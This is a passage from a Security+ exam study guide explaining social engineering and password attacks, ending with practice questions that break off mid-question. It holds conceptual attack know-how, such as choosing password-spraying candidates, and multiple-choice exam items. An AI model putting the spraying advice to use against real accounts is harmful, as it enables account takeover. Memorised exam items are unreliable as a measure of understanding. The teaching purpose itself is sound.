Pretending to be someone else, or impersonation, is a key tool in a
social engineer's toolkit, and like all of the other social engineering
techniques we have discussed, it can be used for malicious purposes.
Each of these techniques combines the willingness of the target or
targets to believe the impersonator with the principles of social
engineering to create a scenario where the social engineer will get the
access, data, or other results they desire.
Identity fraud, or identity theft, is the use of someone else's identity.
Although identity fraud is typically used for financial gain by
malicious actors, identity fraud may be used as part of penetration
tests or other security efforts as well. In fact, in some cases
impersonation, where you act as if you are someone else, can be a
limited form of identity fraud. In other cases, impersonation is less
specific, and the social engineer or attacker who uses it may simply
pretend to be a delivery driver or an employee of a service provider
rather than claiming a specific identity.

Business Email Compromises
Business email compromise, often called BEC, relies on using
apparently legitimate email addresses to conduct scams and other
attacks. Common examples of this include invoice scams, gift card
scams, data theft, and account compromise/account access attacks.
As with other types of email-focused scams and attacks, there are
multiple methods that may be used to create legitimate appearing
email, including:

Using compromised accounts
Sending spoofed emails
Using common fake but similar domain techniques
Using malware or other tools

Microsoft provides a detailed writeup on BEC as part of their
Security 101 at www.microsoft.com/en-
us/security/business/security-101/what-is-business-email-
compromise-bec.
 You may sometimes find BEC called EAC, or email
account compromise, a less specific term than business email
compromise.

Mitigation methods for business email compromise commonly
involve multifactor authentication, awareness training, and policies
that help to support appropriate use and behaviors.

Pretexting
Pretexting is the process of using a made-up scenario to justify why
you are approaching an individual. Pretexting is often used as part of
impersonation efforts to make the impersonator more believable. An
aware target can ask questions or require verification that can help
defeat pretexting and impersonation attacks. In many cases, simply
making a verification call can defeat such attempts.

Watering Hole Attacks
Watering hole attacks use websites that targets frequent to attack
them. These frequently visited sites act like a watering hole for
animals and allow the attackers to stage an attack, knowing that the
victims will visit the site. Once they know what site their targets will
use, attackers can focus on compromising it, either by targeting the
site or deploying malware through other means such as an
advertising network.

Brand Impersonation
Another type of phishing attack is brand impersonation or brand
spoofing. This common form of attack uses emails that are intended
to appear to be from a legitimate brand, relying on name recognition
and even using email templates used by the brand itself.
Brand impersonation is often used in attempts to get users to log into
their existing accounts, particularly for stores and banks. They may
also request payment, gather passwords or other sensitive
information, or may simply have malware attached with instructions
to access a file or run an executable.
As with scam email of all sorts the quality of brand impersonation
email varies from email that is indistinguishable from legitimate
messages to poorly constructed scams like the PayPal scam shown in
Figure 4.1.

FIGURE 4.1 Brand impersonation email

Typosquatting
Typosquatters use misspelled and slightly off but similar to the
legitimate site URLs to conduct typosquatting attacks.
Typosquatters rely on the fact that people will mistype URLs and end
up on their sites, thus driving ad traffic or even sometimes using the
typo-based website to drive sales of similar but not legitimate
products.
 Typosquatting is hard to prevent, but organizations
often register the most common typos for their domains if they're
concerned about it. You can see an example of this by visiting
amason.com, which redirects to Amazon.com!

A related form of attack is known as pharming. Unlike
typosquatting, pharming relies either on changing a system's hosts
file (which is the first reference a system checks when looking up
DNS entries), or on active malware on the system that changes the
system's DNS servers. A successful pharming attack using a hosts-
file-based technique will modify a host’s file and redirect
unsuspecting victims to a lookalike site.

Password Attacks
Although social engineering is often used to acquire passwords or
access, there are other ways to attack passwords as well. Everything
from trying password after password in a brute-force attack, to
technical attacks that leverage precomputed password hashes in
lookup systems to check acquired password hashes against a known
database, can help attackers and penetration testers attack
passwords.
The Security+ exam focuses on two password-related attacks:

Brute-force attacks, which iterate through passwords until they
find one that works. Actual brute-force methods can be more
complex than just using a list of passwords and often involve
word lists that use common passwords, words specifically picked
as likely to be used by the target, and modification rules to help
account for complexity rules. Regardless of how elegant or well
thought out their input is, in the end, brute force is simply a
process that involves trying different variations until it succeeds.
Password spraying attacks are a form of brute-force attack that
attempts to use a single password or small set of passwords
 against many accounts. This approach can be particularly
effective if you know that a target uses a specific default
password or a set of passwords. For example, if you were going
to attack a sports team's fan website, common chants for the
fans, names of well-known players, and other common terms
related to the team might be good candidates for a password
spraying attack.
Dictionary attacks are yet another form of brute-force attack
that uses a list of words for their attempts. Commonly available
brute-force dictionaries exist, and tools like John the Ripper, a
popular open source password cracking tool, have word lists
(dictionaries) built in. Many penetration testers build their own
custom dictionaries as part of their intelligence gathering and
reconnaissance processes.

Exam Note

The SY0-701 Exam Outline focuses on just two types of password
attacks: spraying and brute force. Dictionary attacks and the use
of rainbow tables remain common as well, and help provide
context for password attacks in general. We've included them
here so you'll have the full picture—they just shouldn't show up
on the exam.

Regardless of the password attack mechanism, an important
differentiator between attack methods is whether they occur online,
and thus against a live system that may have defenses in place, or if
they are offline against a compromised or captured password store.
If you can capture hashed passwords from a password store, tools
like rainbow tables can be very useful and will typically be far faster
than brute-force attacks. Rainbow tables are an easily searchable
database of precomputed hashes using the same hashing
methodology as the captured password file. Thus, if you captured a
set of passwords that were hashed using MD5 you could use a pre-
computed hash rainbow table to allow you to simply look up the
hashed passwords.
 If you're not familiar with the concept of hashing,
now is a good time to review it. A hash is a one-way cryptographic
function that takes an input and generates a unique and
repeatable output from that input. No two inputs should ever
generate the same hash, and a hash should not be reversible so
that the original input can be derived from the hash. Of course
hash collisions do occur, which leads to new hashing algorithms
being designed and used. Rainbow tables don't allow you to break
hashes, but they brute-force the solution by using computational
power to create a database where hashes and the value that
created them can be looked up. You still aren't reversing the hash,
but you are able to figure out what plain text leads to that hash
being created!

If you have captured a password file, you can also use a password
cracker against it. Password crackers like John the Ripper, shown in
Figure 4.2, attempt to crack passwords by trying brute-force and
dictionary attacks against a variety of common password storage
formats.

FIGURE 4.2 John the Ripper
 Learning how to use tools like John the Ripper can
help you understand both password cracking and how passwords
are stored. You can find a variety of exercises at
https://openwall.info/wiki/john/tutorials that will get you
started.

Password cracking tools like John the Ripper can also be used as
password assessment tools. Some organizations continue to
periodically test for weak and easily cracked passwords by using a
password cracker on their password stores. In many cases, use of
MFA paired with password complexity requirements have largely
replaced this assessment process, and that trend is likely to continue.
Of course, not every system is well maintained, and a penetration
tester or attacker's favorite opportunity is finding plain-text or
unencrypted passwords to acquire. Without some form of protection,
passwords that are just maintained in a list can be easily acquired
and reused by even the most casual of attackers. As noted earlier,
using a strong password hashing mechanism, as well as techniques
like using a salt and a pepper (additional data added to passwords
before they are hashed, making it harder to use tools like rainbow
tables) can help protect passwords. In fact, best practices for
password storage don't rely on encryption; they rely on passwords
never being stored and instead using a well-constructed password
hash to verify passwords at login.

If you want to learn more about secure password
storage, OWASP maintains a great cheat sheet at
https://cheatsheetseries.owasp.org/cheatsheets/Password_Stor
age_Cheat_Sheet.html.

Summary
Social engineering techniques focus on human reactions and
psychology to gather information and to perform attacks against
individuals and organizations. A broad range of human vectors are
used to accomplish attackers' goals.
Security professionals need to be aware of how social engineering is
leveraged in attacks like phishing, impersonation, misinformation
and disinformation, and other efforts. Each technique has its own
distinctive set of social engineering techniques and impacts that help
make it unique. Test takers need to be familiar with phishing,
vishing, business email compromise, pretexting, watering hole,
brand impersonation, and typosquatting attacks as well as the broad
categories of phishing and impersonation, and misinformation.
Test takers need to be aware of brute-force password attacks that try
repeatedly using a variety of usernames and passwords until they
succeed. You'll also need to know about spraying, a type of brute-
force attack that uses a list of usernames and common passwords to
try to gain access to accounts.

Exam Essentials
Many techniques are used for social engineering. Many
adversarial and security techniques rely on social engineering.
Phishing and its related techniques of smishing and vishing seek to
gain information using social engineering techniques.
Misinformation and disinformation campaigns are used to change
opinions and to shift narratives. Malicious actors will impersonate
whomever they need to acquire information, to gain access or
credentials, or to persuade individuals to take action. Pretexting is
often used with impersonation to provide a believable reason for the
action or request. Business email compromise and brand
impersonation are both used to make malicious emails and other
communications appear legitimate and thus more likely to fool
targets into taking desired action. Watering hole attacks focus on
sites that target frequently visit, while typosquatters rely on users
who make typos while entering URLs.
Passwords can be acquired and cracked in many ways.
Password attacks can be conducted both online against live systems
and offline using captured password stores. Brute-force attacks like
spraying and dictionary attacks as well as password cracking can
recover passwords in many circumstances. Unencrypted or plain-text
passwords and improper or unsecure storage methods like the use of
MD5 hashes make attacks even easier for attackers who can access
them.

Review Questions
1. Joseph receives an email notifying him that he needs to change
his password due to a recent account issue. He notices that the
email links him to a website using the domain amaz0n.com. What
type of attack should he describe this as?
A. Typosquatting
B. Phishing
C. Smishing
D. A watering hole attack
2. When you combine phishing with voicemail, it is known as:
A. Whaling
B. Spoofing
C. Spooning
D. Vishing
3. While reviewing her logs, Michele notices that a remote system
has attempted to log into her server via SSH using the username
admin and a variety of passwords like “password” and “ninja.”
What type of attack has Michele noticed?
A. A brute-force attack
B. Shoulder surfing
C. An on-path attack
D. Pretexting
4. Joanna wants to detect password spraying attacks. What type of
rule should she deploy through her security systems?